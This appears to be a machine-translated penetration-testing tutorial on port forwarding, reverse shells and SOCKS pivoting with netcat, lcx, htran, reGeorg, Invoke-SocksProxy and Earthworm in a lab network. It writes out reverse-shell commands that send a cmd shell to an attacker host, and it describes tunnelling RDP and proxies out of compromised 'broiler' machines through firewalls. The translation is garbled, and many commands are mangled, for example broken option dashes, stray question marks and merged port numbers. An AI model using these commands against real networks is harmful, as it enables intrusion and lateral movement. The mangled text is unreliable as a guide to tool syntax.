0x01 what is port forwarding
Port forwarding, sometimes called tunnel, is a method used by SSH for network security communication. Port forwarding is the behavior of forwarding a network port from one network node to another. It enables an external user to reach a port on a private internal IP address (internal LAN) through an activated NAT router.
Putonghua: port forwarding is to forward a port, which can be the port of the local machine or the port of any host that can be accessed by the local machine, to any IP that can be accessed, usually the IP is the public IP
0x02 what is port mapping
Port mapping is a kind of NAT. Its function is to translate the address in the public network into the private address. The ADSL broadband router with routing mode has a dynamic or fixed public IP. ADSL is directly connected to hub or switch, and all computers share the Internet.
Putonghua: the mapping port is to map an intranet port to a port on the public network. Suppose my own computer is in the intranet, and there is no public IP address, but I want to provide a port for others to use. This is the port mapping
0x03 differentiate between port mapping and port forwarding
Port mapping scenario:
External host a wants to access services on internal host B
Port forwarding scenario:
External host a can access any port on internal host B, but cannot access the port on internal host C
At this time, you can connect the port of the C host to the port of the B host. Then, when the external host a accesses the port of the B host, it is equivalent to accessing the port of the C host
Conclusion:
The principle of port forwarding and port mapping is the same, but the application scenarios are different. If we forward the local port to the remote host port, we can call it port mapping or port forwarding. See the figure below [note the text on the figure]
If we forward the port of any IP that can be accessed by this computer to the port of another server, we will ask other port to forward. See the figure below [note the text on the figure]
0x04 distinguish between forward connection and reverse connection
- Forward connection: your machine connects to the target machine
- Reverse connection: the target machine is reverse connected to your machine
- Whether mapping or forwarding, there are positive and negative, and the principle is the same
0x05 port forwarding and proxy tool
- Lcx
- Htran
- Netcat
0x06 environment topology
A host W7
B host W7
C host XP
0x07 NC
NC usage
2. NC reverse connection network environment assumption:
A external network cannot access the internal network B [A is the attacker in the external network]
B. Intranet can access internet a
A:192.168.0.226
B:192.168.32.130
Suitable for NC reverse connection: it also bounces the shell of intranet host B to the outer network a
Execute on external host a: NC – nvlp 7777
Execute on intranet host B: NC – e CMD 192.168.0.226 7777
Here, pretend I connected to the shell and uploaded the NC
Echo at host a
3. NC forward connection network environment assumption:
A intranet can access external network B [A is the attacker in the intranet]
B external network can not access internal network a
Suitable for NC forward connection: it also bounces the shell of the intranet host a to the Internet host B
Execute NC – L – P 5555 – e cmd.exe on Intranet a
Execute NC – nvv 192.168.0.226 5555 on external host B
4.:
If the client [equivalent to internal network] connects to the server [equivalent to external network] and wants to obtain the server's shell, it is called forward shell. If the client connects to the server and the server wants to obtain the client's shell, it is called reverse shell
NC is a safe Swiss Army knife. It's so famous that it can not only rebound shell, forward port, chat, etc
0x08 LCX
LCX usage:
LCX port mapping environment assumption:
A external network cannot access the internal network B [A is the attacker in the external network]
B. Intranet can access internet a
Execute on intranet host B: lcx.exe – slave 192.168.0.226 7777 192.168.32.132 3389
This means that port 3389 of the intranet (192.168.32.132) is forwarded to port 7777 of the public network (192.168.0.226)
Execute on external host a: lcx.exe – listen 7777 5555
Listen to port 7777 on the host and transfer it to 5555
At this time, connecting remote desktop access 127.0.0.1:5555 on host a is equivalent to accessing 3389 of B
LCX port forwarding environment assumption:
A Internet access B
B Intranet can access C
A can't access C
A host IP: 192.168.0.226
Host B IP: 192.168.32.130
Host C IP: 192.168.32.135
Execute on intranet host B: lcx.exe – tran 7777 192.168.32.135 3389
It means: transfer port 3389 of host C to port 7777 of host B
At this time, accessing port 7777 on host B is equivalent to accessing port 3389 on host C
Running mstsc connection 192.168.32.130:7777 on host a or 127.0.0.1:7777 on host B can access 3389 of C
elaborate
LCX is mostly used for the empty computer (broiler) in the intranet. When the hacker wants to use the remote terminal for management, the hacker will generally turn on the broiler 3389, and then forward it through the LCX port
0x09 HTRAN
HTRAN usage
Htran usage - environmental scenario I
B public network
A can directly access B [and B has turned on 3389, firewall B forbids 3389 connection]
B can also visit a
A host IP: 192.168.0.226
Host B IP: 192.168.32.130
Host C IP: 192.168.32.135
Method 1:
Execute on host B: htran2.4.exe - P - tran 7777 127.0.0.1 3389
This means: convert 3389 of B to 7777 port of this computer
At this time, host a carries out remote desktop terminal connection: 192.168.32.130:7777
Method 2:
Monitor and execute on host a: htran2.4.exe - P - Listen 8888 9999
Listen to port 8888 of this computer and turn the traffic of port 8888 to 9999
Execute on host B: htran2.4.exe - P - slave 192.168.0.226 8888 127.0.0.1 3389
Forward port 3389 of this machine to port 8888 of a
Next, connect the 9999 port of remote desktop access local on host a to connect to 3389 port of B
Htran usage - environmental scenario II
Host B is on the public network
Intranet of C in B
A can access B, not c
A host IP: 192.168.0.226
Host B IP: 192.168.32.130
Host C IP: 192.168.32.135
Method 1:
Execute on host B: htran2.4.exe - P - tran 8888 192.168.32.135 3389
Forward port 3389 of host C to 8888 of host B
At this time, 8888 of a connection B is equivalent to 3389 of C
Method 2:
Monitor htran2.4.exe - P - listen 77779999 on host B
Listen to port 7777 of host B and forward the traffic to 9999
Execute on the C host: htran2.4.exe - P - slave 192.168.32.130 7777 127.0.0.1 3389
It means: transfer 3389 of C to port 7777 of B
0x01 what is agent
Proxy (English: proxy), also known as network proxy, is a special network service that allows one network terminal (generally the client) to make indirect connection with another network terminal (generally the server) through this service. Some network devices such as gateway and router have the function of network agent. It is generally believed that agent service is beneficial to protect the privacy or security of network terminals and prevent attacks
0x02 agent category
http proxy
SOCKS agent
FTP agent
Telnet agent
SSL agent
0x03 distinguish between forward agent and reverse agent
In the forward proxy, the proxy and the client belong to the same LAN and are transparent to the server; in the reverse proxy, the proxy and the server belong to the same LAN and are transparent to the client. One proxy is the client and one proxy is the server
Note: self painted, no criticism A kind of
0x04 regorg + proxychains agent
ReGeorg is the successor to reDuh. It mainly forwards the port of the intranet server to the local machine through the HTTP / HTTPS tunnel
Select the corresponding server script to upload to the server of host B, which is PHP
Access file shows Georg says, 'all seems fine', agent succeeded
Then execute the regorgsocksproxy.py file [urllib3 module required]: python2regorgsocksproxy.py – U "http://192.168.32.130/tunnel.php" – P 8888
The command line interface also displays all seems fine
Next, use the tool proxifier
Add a server first
Configure proxy rules
Select remote desktop program mstsc here
Connect to remote desktop
You can see the traffic through the agent
0x05 Socks4 / 5 agent based on PowerShell
Using invoke socksproxy, https://github.com/p3nt4/invoke socksproxy
Invoke socksproxy usage
Use method 1 of invoke socksproxy
Win10 host IP: 192.168.192.130
Win7 host IP: 192.168.192.129
Setting up a sock4 / 5 agent
First run PowerShell with administrator privileges on win10. If you are prompted that the script is forbidden to execute, enter "set executionpolicyremotesigned"
Enter Import-Module.Invoke-SocksProxy.psm1 to import the module
Enter invoke socksproxy - bindport 1234 to create a socks proxy on port 1234
Next, use socks agent software on win7 to access the Internet through port 1234 of win10
This time, I use sockscap. Of course, proxychains can do the same
Click the file to select "Settings" to set the SOCKS server IP and port, click the application to confirm
Click new to select the program that needs to pass the proxy. I choose Firefox here
Click Run, we visit Baidu
In the W10 host, the window can see that the connection has been successful
Use method 2 of invoke socksproxy
Add thread mode, input invoke socksproxy - bindport 1234 - threads 400
If - bindport is not added, the default port is 1080
0x06 Earthworm
EW is a set of portable network penetration tools, with two core functions of Socksv5 service setup and port forwarding, which can complete network penetration in complex network environment
Note: This tool has stopped updating and downloading
Earthworm usage
The following is a schematic diagram:
The tool can open a network tunnel in the way of "forward", "reverse", "multi-level cascade" to the depth of the network, break through the network limit with the unique means of earthworm, and loosen the soil for the firewall.
A variety of executable files are provided in the toolkit to adapt to different operating systems. Linux, windows, MacOS and arm linux are all included in the toolkit. More platform support is still in maintenance. Please wait.
usage method:
All the following examples, if there is no special description, the proxy port is 1080, and the service is Socksv5 proxy service
The tool has six command formats (ssocksd, rcsocks, rssocks, LCX? Slave, LCX? Listen, LCX? Tran).
- Forward socks V5 server
\$ ./ew -s ssocksd -l 1080
- Bounce socks V5 server
This operation is divided into two steps:
a) First, run the following command on a host a with public IP:
\$ ./ew -s rcsocks -l 1080 -e 8888
b) Start socks V5 service on target host B and rebound to 8888 port of public host
\$ ./ew -s rssocks -d 1.1.1.1 -e 8888
Success.
- Multilevel cascade
There are three port forwarding instructions in the tool. Their parameter formats are as follows:
\$ ./ew -s lcx_listen -l 1080 -e 8888
\$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
\$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
Through these port forwarding instructions, TCP based services in the deep layer of the network can be forwarded to the root, such as socks V5.
First, two local socks test samples of "two-level cascade" are provided:
a) The usage of LCX? Tran
\$ ./ew -s ssocksd -l 9999
\$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999
b) Usage of LCX? Listen and LCX? Slave
\$ ./ew -s lcx_listen -l 1080 -e 8888
\$ ./ew -s ssocksd -l 9999
\$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
Another "three-level cascade" local socks test case is provided for reference
\$ ./ew -s rcsocks -l 1080 -e 8888
\$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
\$ ./ew -s lcx_listen -l 9999 -e 7777
\$ ./ew -s rssocks -d 127.0.0.1 -e 7777
Data flow direction: socks V5 - > 1080 - > 8888 - > 9999 - > 7777 - > rssocks
Note: the above content is from readme on the official website or in the tool
Earthworm usage method 1 [forward agent]
Win7 host IP: 192.168.192.1
Win7 host IP: 192.168.192.9
The target network boundary has public IP and can open any listening port:
+---------+ +-------------------+
|HackTools| ->> | 7777-> 192.168.192.9 |
+---------+ +-------------------+
Execute: EW for win 32.exe - s socksd - L 7777
On the W7 192.168.192.9 host, use this command to open the socks agent of port 7777
Next, you can use tools such as sockcap or proxychains to access the proxy port, because I won't use ink when I mentioned before, and I will directly put the screenshot of the demonstration
Note: This is a forward proxy. The proxy is the hacker client, and the connection is the broiler equivalent to the server
Earthworm usage method 2 [reverse proxy]
Win7 X32 host IP: 192.168.0.75 [hack machine]
Win7 host IP: 192.168.0.226 [public network machine]
Win7 host IP: 192.168.192.9 [intranet]
There is no public IP address at the target network boundary. You need to create a socks proxy by rebound
192.168.192.9 a controllable public IP host controllable internal host
+---------+ +--------------------------+ | +---------------+
|Hacktools - > 1089 - > 192.168.0.226 - > 9999 firewall \ < 192.168.0.75|
+---------+ +--------------------------+ | +---------------+
On the public network [VPS], execute: EW ﹣ for ﹣ win ﹣ 32.exe - s rcsocks - L 1089 - e 9999
Add a transfer tunnel to the public network host at 192.168.0.226, and transfer the proxy request received by 1089 to the host connecting port 9999 in reverse
Execute on the intranet host [controllable broiler]: EW ﹣ for ﹣ win ﹣ 32.exe - s rssocks - D 192.168.0.226 - e 9999
Reverse connect the controllable intranet host of the target network to the public network host
Next, you can use the Socks5 proxy service provided by the rssocks host by accessing the sockcap or proxychains port 192.168.0.226:1089
How to use earthworm III
Win7 host IP: 192.168.192.1 [hack machine]
Win7 host IP: 192.168.192.9 [a]
Win7 host IP: 192.168.192.11 [b]
Obtain the permissions of two hosts a and B in the target network, as described below:
Host a: there is a public IP address, and you can listen to any port freely, and you cannot access specific resources
Host B: internal host of the target network, which can access specific resources but cannot access the public network
Host a can directly connect to host B
Controllable boundary host a can access host B of specified resources
+---------+ +-----------------------+ +----------------
|HackTools| ->> | 1099 -->192.168.192.9 --> | ->> |7777 ->192.168.192.11 |
+---------+ +-----------------------+ +-----------------+
Execute on host B: EW for win 32.exe - s socksd - L 7777
Start the socks agent of port 7777 by using ssocksd mode on host B
Execute on host a: EW for win 32.exe - s LCX tran - L 1099 - F 192.168.192.11 - G 7777
/This means that the socks proxy request received by port 1080 is transferred to port 7777 of host B.
Next, you can use the Socks5 proxy service provided by the rssocks host by accessing the port 192.168.192.9:1099 of sockcap or proxychains
Screenshot of agent success:
How to use earthworm 4
Win7 host IP: 192.168.192.1 [hack machine]
Win7 host IP: 192.168.192.9 [a]
Win7 host IP: 192.168.192.10 [public network machine]
Win7 host IP: 192.168.192.13 [b]
Obtain the permissions of two hosts a and B in the target network, as described below:
Host a: the boundary host of the target network. It has no public IP address and cannot access specific resources.
Host B: the internal host of the target network, which can access specific resources but cannot connect back to the public network.
Host a can directly connect to host B
- Execute on the public computer: EW for win 32.exe - s LCX listen - L 1099 - e 8888
Add a transfer tunnel to the IP host on 192.168.192.10, and transfer the proxy request received by 1080 to the host connecting port 8888 in reverse
- Execute on host B: EW? For? Win? 32.exe - s ssocksd - L 9999
On the 192.168.192.13 [b] host, use the socksd mode to start the socks agent of port 9999
- Execute on host a: EW for win 32.exe - s LCX slave - D 192.168.192.10 - e 8888 - f192.168.192.13 - G 9999
It means: on 192.168.192.9, the communication tunnel between 192.168.192.10:8888 and 192.168.192.13:9999 can be opened through LCX? Slave mode of the tool
- Hacktools can use Socks5 agent provided by 192.168.192.13 host by visiting 192.168.192.10:1099
Successful screenshot:
B
Public network
A
Hack machine
Note: normally in red, my agent B can't access the Internet
Summary of earthworm
At present, the tool provides six link states, which can be selected by the - S parameter, respectively:
ssocksd rcsocks rssocks
lcx_slave lcx_tran lcx_listen
The core logic support of Socks5 service is provided by socksd and rssocks, respectively corresponding to forward and reverse socks agents.
The rest of the LCX link states are used to open the path between the test host and the SOCKS server.
LCX category pipeline
LCX slave one side of the pipeline connects to the proxy requester through rebound mode, and the other side connects to the proxy to provide the host.
LCX? Tran: the pipeline receives the proxy request through listening to the local port and transfers it to the proxy to provide the host.
LCX listen this channel receives data through listening local port and transfers it to the agent connected back to the target network to provide host.
By combining the characteristics of LCX type pipeline, the penetration test in multi-layer Intranet environment can be realized.